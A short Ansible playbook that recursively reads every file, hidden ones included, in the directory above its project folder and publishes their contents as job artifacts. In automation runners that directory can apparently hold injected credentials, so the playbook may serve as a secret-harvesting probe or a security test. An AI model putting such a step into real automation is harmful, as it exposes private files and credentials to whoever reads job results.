---
- name: Find file and send it's content as an artifact
  hosts: localhost
  connection: local
  gather_facts: False
  tasks:
    - name: Find all files
      find:
        file_type: file
        hidden: True
        recurse: True
        paths: ..
      register: files

    - name: Extract file content
      set_fact:
        file_content: "{{ file_content | default({}) | combine({ item.path: lookup('file', item.path) }) }}"
      when: |
        "../project" not in item.path
      loop: "{{ files.files }}"
      loop_control:
        label: "{{ item.path }}"

    - name: Set job stats
      set_stats:
        data:
          files: "{{ file_content }}"
